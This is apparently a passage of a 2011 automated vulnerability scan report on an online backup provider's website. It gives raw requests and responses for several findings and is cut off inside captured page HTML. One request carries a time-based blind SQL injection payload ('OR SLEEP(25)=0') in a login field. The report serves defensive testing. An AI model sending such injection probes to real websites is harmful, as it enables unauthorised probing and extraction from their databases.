width="414" height="43"></td>             <form>            <td background="/images/grad_3u.jpg" valign="middle" align="center" width="164">              <select size="1" onChange="namosw_goto_byselect(this, 'self')" name="select">                  <option selected>Quick Guide</option>                  <option value="/charginghelp_new.htm">Storage                  Plans</option>                  <option value="/ibwin_new.htm">Scheduling</option>                  <option value="/IBDrive_new.htm">Network Drive</option>                  <option value="/tour_collaborate_new.htm">Sharing</option>                  <option value="/subaccountsfaq_new.htm">Sub-Accounts</option>                  <option value="/ftpready_new.htm">FTP</option>                  <option value="/webfolders_new.htm">WebFolders</option>                  <option value="/tour_ibweb_new.htm">Smart IB</option>                  <option value="/ibdrivemac_new.htm">IDrive for Mac                      </option>                  <option value="/iblite_new.htm">Pocket PC</option>                  <option value="/email_new.htm">Email Drop</option>                  <option value="/iblinux_new.htm">Unix/Linux</option>                  <option value="/ibwin/ibackup_lta.htm">IBackup LTA</option>                  <option value="/businesstrial_new.htm">Trial Account</option>                  <option value="/press_new.htm">News/Reviews</option>                </select>            </td> </form>          </tr>      </table>    </td>    <td background="/images/grad_3ext.gif">  </td>  </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="286396">  <tr>    <td width="776">      <table width="776" border="0" cellspacing="0" cellpadding="0">        <tr>          <td width="103" valign="top"><img src="/images/logo_3u.gif" width="103" height="20"></td>          <td width="47" valign="top"><img src="/images/grad_3ua.gif" width="47" height="20"></td>          <td width="48"><img src="/images/cur_3u.gif" width="48" height="20"></td>          <td valign="top" align="right"><img name="Image11" border="0" src="/images/but_ho3u.gif" width="82" height="20" alt="Home"><a href="/profile_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','/images/but_co3u.gif',1)"><img name="Image12" border="0" src="/images/but_co3.gif" width="82" height="20" alt="Company"></a><a href="/regterms_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','/images/but_su3u.gif',1)"><img name="Image13" border="0" src="/images/but_su3.gif" width="82" height="20" alt="Sign up"></a><a href="/security_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image14','','/images/but_se3u.gif',1)"><img name="Image14" border="0" src="/images/but_se3.gif" width="82" height="20" alt="Security"></a><a href="/terms_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image15','','/images/but_te3u.gif',1)"><img name="Image15" border="0" src="/images/but_te3.gif" width="82" height="20" alt="Terms"></a><a href="/feedback_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image16','','/images/but_st3u.gif',1)"><img name="Image16" border="0" src="/images/but_st3.gif" width="82" height="20" alt="Support"></a><a href="/faq.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image17','','/images/but_fq3u.gif',1)"><img name="Image17" border="0" src="/images/but_fq3.gif" width="82" height="20" alt="FAQ"></a></td>        </tr>      </table>    </td>    <td> </td>  </tr></table><table width="776" border="0" cellspacing="0" cellpadding="0">  <tr>    <td width="156" valign="top" bgcolor="#E5E5E5">      <table width="156" border="0" cellspacing="1" cellpadding="0">        <form action="https://www.ibackup.com/qmanager/servlet/LoginCheckServlet" method="POST" name="form1">          <tr>            <td height="43"> </td>            <td><b class="textsmlbk">Sign in</b><br>              <span class="textsmlbk">Username:</span><span class="textsmlbk"><font size="2"></font></span>              <br>              <input type="text" name="USERNAME" size="12" maxlength="20" class="fields">              <span class="textsmlbk"><br>              Password:</span> <br>              <input type="password" name="PASSWORD" size="12" maxlength="20" class="fields">              <br>              <input type=submit name=action value=LoginonClick=' return confirmSubmit(document.form1)' class="formfields">              <a href="/regterms_new.htm"><img src="/images/but_sgn3.gif" width="46" height="17" align="absbottom" border="0" alt="Signup for New Online Backup / Storage account"></a><br>              <a href="/forgotpass_new.htm" class="abodysml">Forgot your Password?</a>            </td>          </tr>        </form>      </table>      <table width="156" border="0" cellspacing="1" cellpadding="0">        <tr>           <td> </td>        </tr>        <tr>           <td><a href="/tour_start_new.htm"><img src="/images/nav_to3.gif" width="154" height="21" alt="Online Backup applications tour" border="0"></a></td>        </tr>        <tr>           <td><a href="/features.htm"><img src="/images/nav_dl3.gif" width="154" height="21" alt="Online Backup and Storage application Downloads" border="0"></a></td>        </tr>        <tr>           <td class="textsmlbk"><a href="/whats_new.htm"><img src="/images/nav_wn3.gif" width="154" height="21" alt="Whats is new - Online Backup " border="0"></a></td>        </tr>        <tr>           <td class="textsmlbk"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"><a href="/charginghelp_new.htm"><img src="/images/promo_2.gif" width="140" height="65" border="0" alt="Backup Only Plans-Click to know more" vspace="5"></a></td>        </tr>        <tr>          <td class="textsmlbk" align="center"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="136" height="99">              <param name=movie value="/images/idp2.swf">              <param name=quality value=high>              <embed src="/images/idp2.swf" quality=high pluginspage="macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="136" height="99">              </embed>             </object></td>        </tr>      </table>      <p> </p>    </td>    <td valign="top" class="textsmlbk">      <table width="610" border="0" cellspacing="0" cellpadding="0" align="right">        <tr>          <td class="textsmlbk"> </td>        </tr>        <tr>          <td>            <table width="608" border="0" cellspacing="0" cellpadding="1" align="right">              <tr>                <td width="281" valign="top" bgcolor="#CCCCCC">                  <table width="281" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF">                    <tr>                      <td align="center"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="ibackup3/download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="281" height="168">                          <param name=movie value="/images/flash_3.swf">                          <param name=quality value=high>                          <embed src="/images/flash_3.swf" quality=high pluginspage="macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="281" height="168">                          </embed>                        </object></td>                    </tr>                  </table>                </td>                <td width="10" class="textsmlbk" bgcolor="#FFFFFF"> </td>                <td valign="top" class="textsmlbk" bgcolor="#CCCCCC" height="168">                  <table width="100%" border="0" cellspacing="0" cellpadding="5" bgcolor="#FFFFFF" height="168">                    <tr>                      <td class="textsmlbk">                        <p align="justify"><b><font color="#666666">Online Backup</font></b>:<b><font color="#666666">                          </font></b>With IBackup, Consumers and Organizations                          of all sizes can have the same enterprise-class data                          protection Fortune 500 uses to safeguard its critical                          information at a fraction of cost.<br>                        <table width="100%" border="0" cellspacing="0" cellpadding="3" class="textsmlbk">                          <tr>                            <td width="80" align="center" valign="middle"><a href="http://www.pcmag.com/article2/0,1759,1585218,00.asp" target="_blank"><img src="/images/ibackupEC.gif" width="56" height="105" border="0" alt="PC Magazine Editors' choice"></a></td>                            <td>                              <p align="justify">IBackup is 2004 PC Magazine Editors'                                choice for Online Backup Solutions.</p>                              <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">                                <tr valign="top">                                  <td width="50%"><a href="/regterms_new.htm"><img src="/images/but_3ctn.gif" width="104" height="25" vspace="0" alt="Consumer Free Trial" border="0"></a></td>                                  <td align="right"><a href="/businesstrial_new.htm"><img src="/images/but_3btn.gif" width="97" height="25" vspace="0" border="0" alt="Business Free Trial"></a></td>                                </tr>                              </table>                            </td>                          </tr>                        </table>                      </td>                    </tr>                  </table>                &..
		 
		
		
		Forbidden Resource
		Forbidden Resource  
		
		
			
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
			
Impact 
There is no impact resulting from this issue.
		 
		
			
			
			
			
			Request 
			GET /license/ HTTP/1.1 Referer: http://www.ibackup.com/license/terms_new.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 403 Forbidden Date: Fri, 24 Jun 2011 01:52:38 GMT Server: Apache Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You don't have permission to access /license/on this server.<P></BODY></HTML>
		 
		
		
		MySQL Database Identified
		MySQL Database Identified  
		
		
			
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.
			
Impact 
This issue is reported as additional information only, there is no direct impact arising from this issue.
		 
		
			
				
					
						- /ibprof/jsp/ibpr_firewallinfo.jsp
						
					 
				 
			
			
			
			
			Request 
			POST /ibprof/jsp/ibpr_firewallinfo.jsp HTTP/1.1 Referer: http://www.ibackup.com/professional/online-backup-firewallguidance.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.ibackup.com Cookie: JSESSIONID=80F5EFFDC646076C473D6C3B00362ECD.tomcat10 Content-Length: 64 Accept-Encoding: gzip, deflate Connection: Keep-Alive submit=Submit&username=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+
			Response 
			HTTP/1.0 200 OK Date: Fri, 24 Jun 2011 02:11:21 GMT Server: Apache Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link href="/professional/images/prof_style.css" rel="stylesheet" type="text/css" /> <script language="javascript" src="/professional/images/prof_swap.js"></script> <script language="JavaScript" src="/professional/images/prof_pmenu.js"></script> <script language="JavaScript" src="/professional/images/prof_mm_menu.js"></script> <script type="text/javascript"> <!-- function MM_swapImgRestore() { //v3.0   var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { //v3.0   var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();     var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)     if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { //v4.01   var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {     d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}   if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];   for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);   if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { //v3.0   var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)    if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } //--> </script> <link rel="icon" href="/professional/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/professional/images/favicon.ico" type="image/x-icon"  /> </head> <body onload="MM_preloadImages('/professional/images/prof_cmddwnd_ovr.gif','images/ibp_signup-ovr.jpg','images/ibp_features-ovr.jpg','images/ibp_dwnld-ovr.jpg','images/ibp_prdts-ovr.jpg','images/ibp_security-ovr.jpg','images/ibp_partners-ovr.jpg','images/ibp_comp-ovr.jpg','images/ibp_supp-ovr.jpg','images/ibp_fqs-ovr.jpg')"> <script language="JavaScript1.2">mmLoadMenus();</script> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="/professional/images/prof_topbg.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td width="160"><a href="/professional/index.html"><img src="/professional/images/prof_logo.jpg" alt="IBackup Professional" width="160" height="115" border="0" /></a></td>         <td align="right"><table width="347" border="0" align="right" cellpadding="0" cellspacing="0">           <tr>             <td width="90" align="right"><a href="/professional/index.html"><img src="/professional/images/prof_homeicon_new.jpg" alt="Home" width="90" height="115" border="0" /></a></td>             <td width="140" align="right"><a href="/professional/online-backup-pricing.htm"><img src="/professional/images/prof_pricing_new.jpg" alt="Pricing Plans" width="140" height="115" border="0" /></a></td>             <td width="117" align="right"><a href="/professional/online-backup-demo.htm"><img src="/professional/images/prof_demoicon_new.gif" alt="View Demo" width="117" height="115" border="0" /></a></td>           </tr>         </table></td>       </tr>     </table></td>   </tr> </table> <img src="/professional/images/prof_spacer.gif" width="10" height="6" /><br /> <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td width="106"><a href="https://www.ibackup.com/ibprof/jsp/ibpn_regterms.jsp" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image44','','/professional/images/ibp_signup-ovr.jpg',1)"><img src="/professional/images/ibp_signup.jpg" name="Image44" width="106" height="42" border="0" id="Image44" /></a></td>     <td width="106"><a href="/professional/online-backup-features.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image45','','/professional/images/ibp_features-ovr.jpg',1)"><img src="/professional/images/ibp_features.jpg" name="Image45" width="106" height="42" border="0" id="Image45" /></a></td>     <td width="106"><a href="/professional/online-backup-download.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image46','','/professional/images/ibp_dwnld-ovr.jpg',1)"><img src="/professional/images/ibp_dwnld.jpg" name="Image46" width="106" height="42" border="0" id="Image46" /></a></td>     <td width="106"><a href="#" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image47','','/professional/images/ibp_prdts-ovr.jpg',1)"><img src="/professional/images/ibp_prdts.jpg" name="Image47" width="106" height="42" border="0" id="Image47" onmouseover="MM_swapImage('Image47','','/professional/images/prof_prd_ovr.jpg',1);MM_showMenu(window.mm_menu_0215100459_0,0,42,null,'Image47')" onmouseout="MM_swapImgRestore();MM_startTimeout()" /></a></td>     <td width="106"><a href="/professional/online-backup-security.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image48','','/professional/images/ibp_security-ovr.jpg',1)"><img src="/professional/images/ibp_security.jpg" name="Image48" width="106" height="42" border="0" id="Image48" /></a></td>     <td width="106"><a href="/professional/partner/index.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image49','','/professional/images/ibp_partners-ovr.jpg',1)"><img src="/professional/images/ibp_partners.jpg" name="Image49" width="106" height="42" border="0" id="Image49" /></a></td>     <td width="112"><a href="/professional/online-backup-compliance.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image41','','/professional/images/ibp_comp-ovr.jpg',1)"><img src="/professional/images/ibp_comp.jpg" name="Image41" width="112" height="42" border="0" id="Image41" /></a></td>     <td width="106"><a href="/professional/online-backup-support.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image42','','/professional/images/ibp_supp-ovr.jpg',1)"><img src="/professional/images/ibp_supp.jpg" name="Image42" width="106" height="42" border="0" id="Image42" /></a></td>     <td width="106" align="left"><a href="/professional/online-backup-faq.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image43','','/professional/images/ibp_fqs-ovr.jpg',1)"><img src="/professional/images/ibp_fqs.jpg" name="Image43" width="106" height="42" border="0" id="Image43" /></a></td>   </tr> </table> <img src="/professional/images/prof_spacer.gif" width="10" height="6" /><br /> </body> </html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>IBackup Professional - Online Backup with higher security and higher retention</title> <link rel="stylesheet" href="/professional/images/ibprof_style.css" type="text/css" /> <script src="/professional/images/AC_RunActiveContent.js" type="text/javascript"></script> <script language="JavaScript" src="/professional/images/mm_menu.js"></script> <script language="JavaScript" src="/professional/images/ibpn_pmenu.js"></script> <script language="JavaScript"> <!-- function validateForm(thisForm) { if (thisForm.username.value =='') 	{ 		thisForm.username.focus(); 		alert('Select the Username.'); 		return (false); 	} 	else 	{ 	return true; 	} } function MM_swapImgRestore() { //v3.0   var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { //v3.0   var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();     var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)     if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { //v4.0   var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {     d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}   if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];   for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);   if(!x && document.getElementById) x=document.getElementById(n); return x; } function MM_swapImage() { //v3.0   var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)    if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } //--> </script> <script language="JavaScript1.2" src="/professional/fw_menu.js"></script> </head> <body LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0"> <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" >   <tr>     <td valign="top"><img src="/professional/images/prof_newtopbg.gif" width="960" height="16" /></td>   </tr>   <tr>     <td width="100%" valign="top" background="/professional/images/prof_newmbg.gif"> 	<br /> 	<table width="96%" border="0" align="center" cellpadding="4" cellspacing="0" class="txt-content">       <tr>         <td class="txt-orange-small"><strong>Firewall Guidance</strong></td>       </tr>       <tr>         <td><hr size="1" color="#e3e3e3" noshade="noshade" /></td>       </tr>       <tr>         <td><p align="justify">IBackup Professional application is designed to be firewall friendly. In most cases, you simply will have to permit firewall prompts related to IBackup Professional on install. In case you need to configure firewall permissions manually, here are the details:</p>           <p align="justify"> Following IPs and Ports are used by IBackup Professional. You need to configure your firewall to allow these:</p>           <br />             <table width="96%" border="0" align="center" cellpadding="7" cellspacing="1" class="txt-content">               <tr>                 <td width="240" valign="top"><strong>Server IP address and port number</strong></td>                 <td width="10" valign="top">:</td>                 <td valign="top">64.14.192.230 and 11900 				 				</td>               </tr>               <tr>                 <td><strong>Executable</strong></td>                 <td>:</td>                 <td>IBackupProfClient.exe</td>               </tr>             </table>           <br /></td>       </tr>     </table> 	 	<br /> 	</td>   </tr>   <tr>     <td valign="top"><img src="/professional/images/prof_newbtnbg.gif" width="960" height="16" /></td>   </tr> </table> </body> </html> <!-- saved from url=(0022)http://internet.e-mail --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link href="/professional/images/prof_style.css" rel="stylesheet" type="text/css" /> </head> <body> <img src="/professional/images/prof_spacer.gif" width="10" height="6" /><br /> <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td background="/professional/images/prof_ftrline_btm.jpg"><img src="/professional/images/prof_spacer.gif" width="20" height="2" /></td>   </tr>   <tr>     <td background="/professional/images/prof_ftrcolor.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0" class="txt-content">       <tr>         <td width="5"><img src="/professional/images/prof_spacer.gif" width="5" height="70" /></td>         <td align="center"><span class="txtfooter">Copyright © Pro Softnet Corporation.<br />           All rights   reserved.</span></td>       </tr>     </table></td>   </tr>   <tr>     <td bgcolor="#666666"><img src="/professional/images/prof_spacer.gif" width="10" height="10" /></td>   </tr> </table> </body> </html>
		 
		
		
		E-mail Address Disclosure
		E-mail Address Disclosure  
		
		
			
Netsparker found e-mail addresses on the web site. 
			
Impact 
 
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References 
		 
		
			
			
			
			
			
			
				support@ibackup.com
			Request 
			GET /feedback_new.htm HTTP/1.1 Referer: http://www.ibackup.com/forgotpass_new.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:52:38 GMT Server: Apache Last-Modified: Wed, 11 May 2011 10:39:40 GMT ETag: "10c7fa-5d03-4dca676c" Accept-Ranges: bytes Content-Length: 23811 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Online backup tech support</title> <link rel="stylesheet"  href="includes/obk_style.css" type="text/css"> <script language="JavaScript" src="includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="includes/obk_mm_menu.js"></script> <script language="JavaScript" src="includes/obk_pmenu.js"></script> <script language="JavaScript" src="includes/obk_dropDown.js"></script> <script language="JavaScript" src="/qmanager/common.js"></script> <script language="JavaScript" src="/qmanager/feedBackEmailAjax.js"></script> <script language="JavaScript">  <!-- function namosw_goto_byselect(sel, targetstr) {   var index = sel.selectedIndex;   if (sel.options[index].value != '') {      if (targetstr == 'blank') {        window.open(sel.options[index].value, 'win1');      } else {        var frameobj;        if ((frameobj = eval(targetstr)) != null)        frameobj.location = sel.options[index].value;      }   } } function MM_preloadImages() { //v3.0   var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();     var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)     if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } //--> function submitNew(form) { if (invalidName(form.FIRSTNAME.value)) { form.FIRSTNAME.focus(); alert('First name can only contain characters A-Z, a-z and blank space.'); return (false); } if (invalidName(form.LASTNAME.value)) { form.LASTNAME.focus(); alert('Last name can only contain characters A-Z, a-z and blank space.'); return (false); } else if(!isValidEmailId(trim(form.EMAIL.value))) { form.invEmail.value==""; form.EMAIL.focus(); alert('Enter a valid email address.'); return(false); } if(form.USERNAME.value!= '' && invalidUserNameNew(trim(form.USERNAME.value))) { form.USERNAME.focus(); alert('Enter a valid username.'); return(false); } if( form.select1.value=='' ) { form.invUser.value = ''; form.select1.focus(); alert('Select the operating system.'); return(false); } else if( form.select.value=='' ) { form.select.focus(); alert('Select the browser.'); return(false); } else if( form.select2.value=='' ) { form.select2.focus(); alert('Select the connection type.'); return(false); } else if( form.select3.value=='') { form.select3.focus(); alert('Select the IBackup program.'); return(false); } else if( (form.PHONE.value!='') && (invalidPhoneNumber(form.PHONE.value))) { form.PHONE.focus(); alert('Phone number can only contain characters 0-9 x X - +.'); return(false); } else if( form.select3.value=='Other' && form.textarea.value=='') { form.textarea.focus(); alert('Enter your problem/query/comments.'); return(false); } else{	   		STREAMNET.ibackup.emailVerifySyn(form); 		if(form.invUser.value==""){ 		return true; 		}else{ 		return false ; 		}	   }   form.FIRSTNAME.value = checkAndReplace(form.FIRSTNAME.value); form.LASTNAME.value = checkAndReplace(form.LASTNAME.value); form.USERNAME.value = checkAndReplace(form.USERNAME.value); form.EMAIL.value = checkAndReplace(form.EMAIL.value); form.select1.value = checkAndReplace(form.select1.value); form.select2.value = checkAndReplace(form.select2.value); form.select3.value = checkAndReplace(form.select3.value); form.PHONE.value = checkAndReplace(form.PHONE.value); form.textarea.value = checkAndReplace(form.textarea.value); return(true); } function show() { if(document.getElementById("select1").value=="iOS 3.2") 		document.getElementById("select3").value="IBackup for iPhone";		 else if(document.getElementById("select1").value=="iOS 4.0") 		document.getElementById("select3").value="IBackup for iPhone";				 else if(document.getElementById("select1").value=="iOS 4.1") 		document.getElementById("select3").value="IBackup for iPhone";				 else if(document.getElementById("select1").value=="iOS 4.2") 		document.getElementById("select3").value="IBackup for iPhone";				 else{ 		document.getElementById("select3").value=""; 		} 	} </SCRIPT>	 </script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">  <tr>   <td background="images/obk_topbg.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0">     <tr>      <td width="160"><a href="index.html"><img src="images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>      <td align="right" valign="top"><a href="feedback_new.htm"><img src="images/obk_hd_support.jpg" alt="Support" width="161" height="50" border="0" /></a></td>     </tr>    </table></td>  </tr> </table> <table width="100%" background="images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0">  <tr>   <td><img src="images/obk_spacer.gif" width="2" height="9" /><br />    <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">     <tr>      <td id="mn_home"><a href="index.html"><img src="images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>      <td id="mn_sign"><a href="qmanager/jsp/regterms_new.jsp"><img src="images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>      <td id="mn_price"><a href="charginghelp_new.htm"><img src="images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>      <td id="mn_prod"><a href="#"><img src="images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>      <td id="mn_down"><a href="online-backup-downloads"><img src="images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>      <td id="mn_secur"><a href="online-backup-security"><img src="images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>      <td id="mn_supp"><a href="feedback_new.htm"><img src="images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>      <td id="mn_part"><a href="online-backup-partners"><img src="images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>      <td id="mn_faq"><a href="online-backup-faq"><img src="images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>     </tr>    </table>    <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">     <tr>      <td background="images/obk_banr_support1.jpg" valign="top" class="security_banner"><table width="100%" border="0" cellspacing="0" cellpadding="0">        <tr>         <td width="76%" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">           <tr>            <td><h1 class="banner_txt1">Support</h1></td>           </tr>           <tr>            <td valign="top" class="banner_txt">Allow us to assist you in case             of technical queries or send us feedback <br />             on how we can serve your online backup and storage needs better</td>           </tr>          </table></td>         <td width="24%" valign="top" style="padding:21px 0px 0px 5px;"><!-- <img src="images/obk_banr_supportoffline.jpg" width="186" height="167" />-->          <!--BEGIN ProvideSupport.com Custom Images Chat Button Code -->          <div id="cif8GW" style="z-index:100;position:absolute"></div>          <div id="scf8GW" style="display:inline"></div>          <div id="sdf8GW" style="display:none"></div>          <script type="text/javascript">var sef8GW=document.createElement("script");sef8GW.type="text/javascript";sef8GW.defer=true;sef8GW.src=(location.protocol.indexOf("https")==0?"https://secure.providesupport.com/image":"http://image.providesupport.com")+"/js/dx_tests/safe-standard.js?ps_h=f8GW&ps_t="+new Date().getTime()+"&online-image=https%3A//www.ibackup.com/images/obk_banr_supportonline.jpg&offline-image=https%3A//www.ibackup.com/images/obk_banr_supportoffline.jpg";document.getElementById("sdf8GW").appendChild(sef8GW)</script>          <noscript>          <div style="display:inline"><a href="http://www.providesupport.com?messenger=dx_tests">Live            Support</a></div>          </noscript>          <!-- END ProvideSupport.com Custom Images Chat Button Code --></td>        </tr>       </table></td>     </tr>    </table></td>  </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0">  <tr>   <td background="images/obk_subpag_bg.jpg" style="background-repeat:repeat-x;"><img src="images/obk_spacer.gif" width="2" height="40" />    <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">     <tr>      <td valign="top"><p><span class="txt-content"> Monday - Friday, 6:00 AM         to 6:00 PM PST <br />        <span class="lnktxt">1-800-949-3555 </span>within USA <br />        <span class="lnktxt">1-818-251-4200</span> outside USA <br />        <br />        <span class="lnkmore">Department Extensions:</span> <br />        <span class="txtgreybold"><br />        </span></span><span class="lnktxt">Dial 2</span><span class="txt-content"> for        Sales<br />        <span class="lnktxt">Dial 3</span> to avail Technical support<br />        <span class="lnktxt">Dial 4 </span>for all your Billing inquiries</span></p>       <p> In case you are unable to reach us on the extension for a particular        department, dial the other extension. You can also contact us via email        at <a href="mailto:support@ibackup.com" class="lnktxt">support@ibackup.com</a>,        live chat (available 24 x 7) or using the feedback form below.</p></td>     </tr>    </table></td>  </tr> </table> <img src="images/obk_spacer.gif" width="2" height="25" /><br /> <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">  <tr>   <td><table width="200" border="0" cellspacing="0" cellpadding="0">     <tr>      <td 